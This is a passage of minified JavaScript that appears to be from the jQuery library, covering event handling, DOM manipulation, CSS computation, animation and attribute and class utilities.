b,c,d,f,g,h=[],i=e.call(arguments),j=(N.get(this,"events")||{})[a.type]||[],k=n.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=n.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,c=0;while((g=f.handlers[c++])&&!a.isImmediatePropagationStopped())a.rnamespace&&!a.rnamespace.test(g.namespace)||(a.handleObj=g,a.data=g.data,d=((n.event.special[g.origType]||{}).handle||g.handler).apply(f.elem,i),void 0!==d&&(a.result=d)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&("click"!==a.type||isNaN(a.button)||a.button<1))for(;i!==this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(d=[],c=0;h>c;c++)f=b[c],e=f.selector+" ",void 0===d[e]&&(d[e]=f.needsContext?n(e,this).index(i)>-1:n.find(e,this,null,[i]).length),d[e]&&d.push(f);d.length&&g.push({elem:i,handlers:d})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},props:"altKey bubbles cancelable ctrlKey currentTarget detail eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,e,f,g=b.button;return null==a.pageX&&null!=b.clientX&&(c=a.target.ownerDocument||d,e=c.documentElement,f=c.body,a.pageX=b.clientX+(e&&e.scrollLeft||f&&f.scrollLeft||0)-(e&&e.clientLeft||f&&f.clientLeft||0),a.pageY=b.clientY+(e&&e.scrollTop||f&&f.scrollTop||0)-(e&&e.clientTop||f&&f.clientTop||0)),a.which||void 0===g||(a.which=1&g?1:2&g?3:4&g?2:0),a}},fix:function(a){if(a[n.expando])return a;var b,c,e,f=a.type,g=a,h=this.fixHooks[f];h||(this.fixHooks[f]=h=ea.test(f)?this.mouseHooks:da.test(f)?this.keyHooks:{}),e=h.props?this.props.concat(h.props):this.props,a=new n.Event(g),b=e.length;while(b--)c=e[b],a[c]=g[c];return a.target||(a.target=d),3===a.target.nodeType&&(a.target=a.target.parentNode),h.filter?h.filter(a,g):a},special:{load:{noBubble:!0},focus:{trigger:function(){return this!==ia()&&this.focus?(this.focus(),!1):void 0},delegateType:"focusin"},blur:{trigger:function(){return this===ia()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return"checkbox"===this.type&&this.click&&n.nodeName(this,"input")?(this.click(),!1):void 0},_default:function(a){return n.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}}},n.removeEvent=function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c)},n.Event=function(a,b){return this instanceof n.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?ga:ha):this.type=a,b&&n.extend(this,b),this.timeStamp=a&&a.timeStamp||n.now(),void(this[n.expando]=!0)):new n.Event(a,b)},n.Event.prototype={constructor:n.Event,isDefaultPrevented:ha,isPropagationStopped:ha,isImmediatePropagationStopped:ha,isSimulated:!1,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=ga,a&&!this.isSimulated&&a.preventDefault()},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=ga,a&&!this.isSimulated&&a.stopPropagation()},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=ga,a&&!this.isSimulated&&a.stopImmediatePropagation(),this.stopPropagation()}},n.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){n.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return e&&(e===d||n.contains(d,e))||(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),n.fn.extend({on:function(a,b,c,d){return ja(this,a,b,c,d)},one:function(a,b,c,d){return ja(this,a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,n(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return b!==!1&&"function"!=typeof b||(c=b,b=void 0),c===!1&&(c=ha),this.each(function(){n.event.remove(this,a,c,b)})}});var ka=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi,la=/<script|<style|<link/i,ma=/checked\s*(?:[^=]|=\s*.checked.)/i,na=/^true\/(.*)/,oa=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;function pa(a,b){return n.nodeName(a,"table")&&n.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function qa(a){return a.type=(null!==a.getAttribute("type"))+"/"+a.type,a}function ra(a){var b=na.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function sa(a,b){var c,d,e,f,g,h,i,j;if(1===b.nodeType){if(N.hasData(a)&&(f=N.access(a),g=N.set(b,f),j=f.events)){delete g.handle,g.events={};for(e in j)for(c=0,d=j[e].length;d>c;c++)n.event.add(b,e,j[e][c])}O.hasData(a)&&(h=O.access(a),i=n.extend({},h),O.set(b,i))}}function ta(a,b){var c=b.nodeName.toLowerCase();"input"===c&&X.test(a.type)?b.checked=a.checked:"input"!==c&&"textarea"!==c||(b.defaultValue=a.defaultValue)}function ua(a,b,c,d){b=f.apply([],b);var e,g,h,i,j,k,m=0,o=a.length,p=o-1,q=b[0],r=n.isFunction(q);if(r||o>1&&"string"==typeof q&&!l.checkClone&&ma.test(q))return a.each(function(e){var f=a.eq(e);r&&(b[0]=q.call(this,e,f.html())),ua(f,b,c,d)});if(o&&(e=ca(b,a[0].ownerDocument,!1,a,d),g=e.firstChild,1===e.childNodes.length&&(e=g),g||d)){for(h=n.map(_(e,"script"),qa),i=h.length;o>m;m++)j=e,m!==p&&(j=n.clone(j,!0,!0),i&&n.merge(h,_(j,"script"))),c.call(a[m],j,m);if(i)for(k=h[h.length-1].ownerDocument,n.map(h,ra),m=0;i>m;m++)j=h[m],Z.test(j.type||"")&&!N.access(j,"globalEval")&&n.contains(k,j)&&(j.src?n._evalUrl&&n._evalUrl(j.src):n.globalEval(j.textContent.replace(oa,"")))}return a}function va(a,b,c){for(var d,e=b?n.filter(b,a):a,f=0;null!=(d=e[f]);f++)c||1!==d.nodeType||n.cleanData(_(d)),d.parentNode&&(c&&n.contains(d.ownerDocument,d)&&aa(_(d,"script")),d.parentNode.removeChild(d));return a}n.extend({htmlPrefilter:function(a){return a.replace(ka,"<$1></$2>")},clone:function(a,b,c){var d,e,f,g,h=a.cloneNode(!0),i=n.contains(a.ownerDocument,a);if(!(l.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||n.isXMLDoc(a)))for(g=_(h),f=_(a),d=0,e=f.length;e>d;d++)ta(f[d],g[d]);if(b)if(c)for(f=f||_(a),g=g||_(h),d=0,e=f.length;e>d;d++)sa(f[d],g[d]);else sa(a,h);return g=_(h,"script"),g.length>0&&aa(g,!i&&_(a,"script")),h},cleanData:function(a){for(var b,c,d,e=n.event.special,f=0;void 0!==(c=a[f]);f++)if(L(c)){if(b=c[N.expando]){if(b.events)for(d in b.events)e[d]?n.event.remove(c,d):n.removeEvent(c,d,b.handle);c[N.expando]=void 0}c[O.expando]&&(c[O.expando]=void 0)}}}),n.fn.extend({domManip:ua,detach:function(a){return va(this,a,!0)},remove:function(a){return va(this,a)},text:function(a){return K(this,function(a){return void 0===a?n.text(this):this.empty().each(function(){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||(this.textContent=a)})},null,a,arguments.length)},append:function(){return ua(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=pa(this,a);b.appendChild(a)}})},prepend:function(){return ua(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=pa(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return ua(this,arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return ua(this,arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},empty:function(){for(var a,b=0;null!=(a=this[b]);b++)1===a.nodeType&&(n.cleanData(_(a,!1)),a.textContent="");return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return n.clone(this,a,b)})},html:function(a){return K(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a&&1===b.nodeType)return b.innerHTML;if("string"==typeof a&&!la.test(a)&&!$[(Y.exec(a)||["",""])[1].toLowerCase()]){a=n.htmlPrefilter(a);try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(n.cleanData(_(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=[];return ua(this,arguments,function(b){var c=this.parentNode;n.inArray(this,a)<0&&(n.cleanData(_(this)),c&&c.replaceChild(b,this))},a)}}),n.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){n.fn[a]=function(a){for(var c,d=[],e=n(a),f=e.length-1,h=0;f>=h;h++)c=h===f?this:this.clone(!0),n(e[h])[b](c),g.apply(d,c.get());return this.pushStack(d)}});var wa,xa={HTML:"block",BODY:"block"};function ya(a,b){var c=n(b.createElement(a)).appendTo(b.body),d=n.css(c[0],"display");return c.detach(),d}function za(a){var b=d,c=xa[a];return c||(c=ya(a,b),"none"!==c&&c||(wa=(wa||n("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=wa[0].contentDocument,b.write(),b.close(),c=ya(a,b),wa.detach()),xa[a]=c),c}var Aa=/^margin/,Ba=new RegExp("^("+S+")(?!px)[a-z%]+$","i"),Ca=function(b){var c=b.ownerDocument.defaultView;return c&&c.opener||(c=a),c.getComputedStyle(b)},Da=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e},Ea=d.documentElement;!function(){var b,c,e,f,g=d.createElement("div"),h=d.createElement("div");if(h.style){h.style.backgroundClip="content-box",h.cloneNode(!0).style.backgroundClip="",l.clearCloneStyle="content-box"===h.style.backgroundClip,g.style.cssText="border:0;width:8px;height:0;top:0;left:-9999px;padding:0;margin-top:1px;position:absolute",g.appendChild(h);function i(){h.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;position:relative;display:block;margin:auto;border:1px;padding:1px;top:1%;width:50%",h.innerHTML="",Ea.appendChild(g);var d=a.getComputedStyle(h);b="1%"!==d.top,f="2px"===d.marginLeft,c="4px"===d.width,h.style.marginRight="50%",e="4px"===d.marginRight,Ea.removeChild(g)}n.extend(l,{pixelPosition:function(){return i(),b},boxSizingReliable:function(){return null==c&&i(),c},pixelMarginRight:function(){return null==c&&i(),e},reliableMarginLeft:function(){return null==c&&i(),f},reliableMarginRight:function(){var b,c=h.appendChild(d.createElement("div"));return c.style.cssText=h.style.cssText="-webkit-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",c.style.marginRight=c.style.width="0",h.style.width="1px",Ea.appendChild(g),b=!parseFloat(a.getComputedStyle(c).marginRight),Ea.removeChild(g),h.removeChild(c),b}})}}();function Fa(a,b,c){var d,e,f,g,h=a.style;return c=c||Ca(a),g=c?c.getPropertyValue(b)||c[b]:void 0,""!==g&&void 0!==g||n.contains(a.ownerDocument,a)||(g=n.style(a,b)),c&&!l.pixelMarginRight()&&Ba.test(g)&&Aa.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f),void 0!==g?g+"":g}function Ga(a,b){return{get:function(){return a()?void delete this.get:(this.get=b).apply(this,arguments)}}}var Ha=/^(none|table(?!-c[ea]).+)/,Ia={position:"absolute",visibility:"hidden",display:"block"},Ja={letterSpacing:"0",fontWeight:"400"},Ka=["Webkit","O","Moz","ms"],La=d.createElement("div").style;function Ma(a){if(a in La)return a;var b=a[0].toUpperCase()+a.slice(1),c=Ka.length;while(c--)if(a=Ka[c]+b,a in La)return a}function Na(a,b,c){var d=T.exec(b);return d?Math.max(0,d[2]-(c||0))+(d[3]||"px"):b}function Oa(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=n.css(a,c+U[f],!0,e)),d?("content"===c&&(g-=n.css(a,"padding"+U[f],!0,e)),"margin"!==c&&(g-=n.css(a,"border"+U[f]+"Width",!0,e))):(g+=n.css(a,"padding"+U[f],!0,e),"padding"!==c&&(g+=n.css(a,"border"+U[f]+"Width",!0,e)));return g}function Pa(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=Ca(a),g="border-box"===n.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=Fa(a,b,f),(0>e||null==e)&&(e=a.style[b]),Ba.test(e))return e;d=g&&(l.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Oa(a,b,c||(g?"border":"content"),d,f)+"px"}function Qa(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=N.get(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&V(d)&&(f[g]=N.access(d,"olddisplay",za(d.nodeName)))):(e=V(d),"none"===c&&e||N.set(d,"olddisplay",e?c:n.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}n.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=Fa(a,"opacity");return""===c?"1":c}}}},cssNumber:{animationIterationCount:!0,columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":"cssFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=n.camelCase(b),i=a.style;return b=n.cssProps[h]||(n.cssProps[h]=Ma(h)||h),g=n.cssHooks[b]||n.cssHooks[h],void 0===c?g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b]:(f=typeof c,"string"===f&&(e=T.exec(c))&&e[1]&&(c=W(a,b,e),f="number"),null!=c&&c===c&&("number"===f&&(c+=e&&e[3]||(n.cssNumber[h]?"":"px")),l.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),g&&"set"in g&&void 0===(c=g.set(a,c,d))||(i[b]=c)),void 0)}},css:function(a,b,c,d){var e,f,g,h=n.camelCase(b);return b=n.cssProps[h]||(n.cssProps[h]=Ma(h)||h),g=n.cssHooks[b]||n.cssHooks[h],g&&"get"in g&&(e=g.get(a,!0,c)),void 0===e&&(e=Fa(a,b,d)),"normal"===e&&b in Ja&&(e=Ja[b]),""===c||c?(f=parseFloat(e),c===!0||isFinite(f)?f||0:e):e}}),n.each(["height","width"],function(a,b){n.cssHooks[b]={get:function(a,c,d){return c?Ha.test(n.css(a,"display"))&&0===a.offsetWidth?Da(a,Ia,function(){return Pa(a,b,d)}):Pa(a,b,d):void 0},set:function(a,c,d){var e,f=d&&Ca(a),g=d&&Oa(a,b,d,"border-box"===n.css(a,"boxSizing",!1,f),f);return g&&(e=T.exec(c))&&"px"!==(e[3]||"px")&&(a.style[b]=c,c=n.css(a,b)),Na(a,c,g)}}}),n.cssHooks.marginLeft=Ga(l.reliableMarginLeft,function(a,b){return b?(parseFloat(Fa(a,"marginLeft"))||a.getBoundingClientRect().left-Da(a,{marginLeft:0},function(){return a.getBoundingClientRect().left}))+"px":void 0}),n.cssHooks.marginRight=Ga(l.reliableMarginRight,function(a,b){return b?Da(a,{display:"inline-block"},Fa,[a,"marginRight"]):void 0}),n.each({margin:"",padding:"",border:"Width"},function(a,b){n.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+U[d]+b]=f[d]||f[d-2]||f[0];return e}},Aa.test(a)||(n.cssHooks[a+b].set=Na)}),n.fn.extend({css:function(a,b){return K(this,function(a,b,c){var d,e,f={},g=0;if(n.isArray(b)){for(d=Ca(a),e=b.length;e>g;g++)f[b[g]]=n.css(a,b[g],!1,d);return f}return void 0!==c?n.style(a,b,c):n.css(a,b)},a,b,arguments.length>1)},show:function(){return Qa(this,!0)},hide:function(){return Qa(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){V(this)?n(this).show():n(this).hide()})}});function Ra(a,b,c,d,e){return new Ra.prototype.init(a,b,c,d,e)}n.Tween=Ra,Ra.prototype={constructor:Ra,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||n.easing._default,this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=Ra.propHooks[this.prop];return a&&a.get?a.get(this):Ra.propHooks._default.get(this)},run:function(a){var b,c=Ra.propHooks[this.prop];return this.options.duration?this.pos=b=n.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):this.pos=b=a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Ra.propHooks._default.set(this),this}},Ra.prototype.init.prototype=Ra.prototype,Ra.propHooks={_default:{get:function(a){var b;return 1!==a.elem.nodeType||null!=a.elem[a.prop]&&null==a.elem.style[a.prop]?a.elem[a.prop]:(b=n.css(a.elem,a.prop,""),b&&"auto"!==b?b:0)},set:function(a){n.fx.step[a.prop]?n.fx.step[a.prop](a):1!==a.elem.nodeType||null==a.elem.style[n.cssProps[a.prop]]&&!n.cssHooks[a.prop]?a.elem[a.prop]=a.now:n.style(a.elem,a.prop,a.now+a.unit)}}},Ra.propHooks.scrollTop=Ra.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},n.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2},_default:"swing"},n.fx=Ra.prototype.init,n.fx.step={};var Sa,Ta,Ua=/^(?:toggle|show|hide)$/,Va=/queueHooks$/;function Wa(){return a.setTimeout(function(){Sa=void 0}),Sa=n.now()}function Xa(a,b){var c,d=0,e={height:a};for(b=b?1:0;4>d;d+=2-b)c=U[d],e["margin"+c]=e["padding"+c]=a;return b&&(e.opacity=e.width=a),e}function Ya(a,b,c){for(var d,e=(_a.tweeners[b]||[]).concat(_a.tweeners["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function Za(a,b,c){var d,e,f,g,h,i,j,k,l=this,m={},o=a.style,p=a.nodeType&&V(a),q=N.get(a,"fxshow");c.queue||(h=n._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,l.always(function(){l.always(function(){h.unqueued--,n.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[o.overflow,o.overflowX,o.overflowY],j=n.css(a,"display"),k="none"===j?N.get(a,"olddisplay")||za(a.nodeName):j,"inline"===k&&"none"===n.css(a,"float")&&(o.display="inline-block")),c.overflow&&(o.overflow="hidden",l.always(function(){o.overflow=c.overflow[0],o.overflowX=c.overflow[1],o.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],Ua.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(p?"hide":"show")){if("show"!==e||!q||void 0===q[d])continue;p=!0}m[d]=q&&q[d]||n.style(a,d)}else j=void 0;if(n.isEmptyObject(m))"inline"===("none"===j?za(a.nodeName):j)&&(o.display=j);else{q?"hidden"in q&&(p=q.hidden):q=N.access(a,"fxshow",{}),f&&(q.hidden=!p),p?n(a).show():l.done(function(){n(a).hide()}),l.done(function(){var b;N.remove(a,"fxshow");for(b in m)n.style(a,b,m[b])});for(d in m)g=Ya(p?q[d]:0,d,l),d in q||(q[d]=g.start,p&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function $a(a,b){var c,d,e,f,g;for(c in a)if(d=n.camelCase(c),e=b[d],f=a[c],n.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=n.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function _a(a,b,c){var d,e,f=0,g=_a.prefilters.length,h=n.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=Sa||Wa(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:n.extend({},b),opts:n.extend(!0,{specialEasing:{},easing:n.easing._default},c),originalProperties:b,originalOptions:c,startTime:Sa||Wa(),duration:c.duration,tweens:[],createTween:function(b,c){var d=n.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?(h.notifyWith(a,[j,1,0]),h.resolveWith(a,[j,b])):h.rejectWith(a,[j,b]),this}}),k=j.props;for($a(k,j.opts.specialEasing);g>f;f++)if(d=_a.prefilters[f].call(j,a,k,j.opts))return n.isFunction(d.stop)&&(n._queueHooks(j.elem,j.opts.queue).stop=n.proxy(d.stop,d)),d;return n.map(k,Ya,j),n.isFunction(j.opts.start)&&j.opts.start.call(a,j),n.fx.timer(n.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}n.Animation=n.extend(_a,{tweeners:{"*":[function(a,b){var c=this.createTween(a,b);return W(c.elem,a,T.exec(b),c),c}]},tweener:function(a,b){n.isFunction(a)?(b=a,a=["*"]):a=a.match(G);for(var c,d=0,e=a.length;e>d;d++)c=a[d],_a.tweeners[c]=_a.tweeners[c]||[],_a.tweeners[c].unshift(b)},prefilters:[Za],prefilter:function(a,b){b?_a.prefilters.unshift(a):_a.prefilters.push(a)}}),n.speed=function(a,b,c){var d=a&&"object"==typeof a?n.extend({},a):{complete:c||!c&&b||n.isFunction(a)&&a,duration:a,easing:c&&b||b&&!n.isFunction(b)&&b};return d.duration=n.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in n.fx.speeds?n.fx.speeds[d.duration]:n.fx.speeds._default,null!=d.queue&&d.queue!==!0||(d.queue="fx"),d.old=d.complete,d.complete=function(){n.isFunction(d.old)&&d.old.call(this),d.queue&&n.dequeue(this,d.queue)},d},n.fn.extend({fadeTo:function(a,b,c,d){return this.filter(V).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=n.isEmptyObject(a),f=n.speed(b,c,d),g=function(){var b=_a(this,n.extend({},a),f);(e||N.get(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=n.timers,g=N.get(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&Va.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));!b&&c||n.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=N.get(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=n.timers,g=d?d.length:0;for(c.finish=!0,n.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),n.each(["toggle","show","hide"],function(a,b){var c=n.fn[b];n.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(Xa(b,!0),a,d,e)}}),n.each({slideDown:Xa("show"),slideUp:Xa("hide"),slideToggle:Xa("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){n.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),n.timers=[],n.fx.tick=function(){var a,b=0,c=n.timers;for(Sa=n.now();b<c.length;b++)a=c[b],a()||c[b]!==a||c.splice(b--,1);c.length||n.fx.stop(),Sa=void 0},n.fx.timer=function(a){n.timers.push(a),a()?n.fx.start():n.timers.pop()},n.fx.interval=13,n.fx.start=function(){Ta||(Ta=a.setInterval(n.fx.tick,n.fx.interval))},n.fx.stop=function(){a.clearInterval(Ta),Ta=null},n.fx.speeds={slow:600,fast:200,_default:400},n.fn.delay=function(b,c){return b=n.fx?n.fx.speeds[b]||b:b,c=c||"fx",this.queue(c,function(c,d){var e=a.setTimeout(c,b);d.stop=function(){a.clearTimeout(e)}})},function(){var a=d.createElement("input"),b=d.createElement("select"),c=b.appendChild(d.createElement("option"));a.type="checkbox",l.checkOn=""!==a.value,l.optSelected=c.selected,b.disabled=!0,l.optDisabled=!c.disabled,a=d.createElement("input"),a.value="t",a.type="radio",l.radioValue="t"===a.value}();var ab,bb=n.expr.attrHandle;n.fn.extend({attr:function(a,b){return K(this,n.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){n.removeAttr(this,a)})}}),n.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(3!==f&&8!==f&&2!==f)return"undefined"==typeof a.getAttribute?n.prop(a,b,c):(1===f&&n.isXMLDoc(a)||(b=b.toLowerCase(),e=n.attrHooks[b]||(n.expr.match.bool.test(b)?ab:void 0)),void 0!==c?null===c?void n.removeAttr(a,b):e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:(a.setAttribute(b,c+""),c):e&&"get"in e&&null!==(d=e.get(a,b))?d:(d=n.find.attr(a,b),null==d?void 0:d))},attrHooks:{type:{set:function(a,b){if(!l.radioValue&&"radio"===b&&n.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(G);if(f&&1===a.nodeType)while(c=f[e++])d=n.propFix[c]||c,n.expr.match.bool.test(c)&&(a[d]=!1),a.removeAttribute(c)}}),ab={set:function(a,b,c){return b===!1?n.removeAttr(a,c):a.setAttribute(c,c),c}},n.each(n.expr.match.bool.source.match(/\w+/g),function(a,b){var c=bb[b]||n.find.attr;bb[b]=function(a,b,d){var e,f;return d||(f=bb[b],bb[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,bb[b]=f),e}});var cb=/^(?:input|select|textarea|button)$/i,db=/^(?:a|area)$/i;n.fn.extend({prop:function(a,b){return K(this,n.prop,a,b,arguments.length>1)},removeProp:function(a){return this.each(function(){delete this[n.propFix[a]||a]})}}),n.extend({prop:function(a,b,c){var d,e,f=a.nodeType;if(3!==f&&8!==f&&2!==f)return 1===f&&n.isXMLDoc(a)||(b=n.propFix[b]||b,e=n.propHooks[b]),
void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){var b=n.find.attr(a,"tabindex");return b?parseInt(b,10):cb.test(a.nodeName)||db.test(a.nodeName)&&a.href?0:-1}}},propFix:{"for":"htmlFor","class":"className"}}),l.optSelected||(n.propHooks.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),n.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){n.propFix[this.toLowerCase()]=this});var eb=/[\t\r\n\f]/g;function fb(a){return a.getAttribute&&a.getAttribute("class")||""}n.fn.extend({addClass:function(a){var b,c,d,e,f,g,h,i=0;if(n.isFunction(a))return this.each(function(b){n(this).addClass(a.call(this,b,fb(this)))});if("string"==typeof a&&a){b=a.match(G)||[];while(c=this[i++])if(e=fb(c),d=1===c.nodeType&&(" "+e+" ").replace(eb," ")){g=0;while(f=b[g++])d.indexOf(" "+f+" ")<0&&(d+=f+" ");h=n.trim(d),e!==h&&c.setAttribute("class",h)}}return this},removeClass:function(a){var b,c,d,e,f,g,h,i=0;if(n.isFunction(a))return this.each(function(b){n(this).removeClass(a.call(this,b,fb(this)))});if(!arguments.length)return this.attr("class","");if("string"==typeof 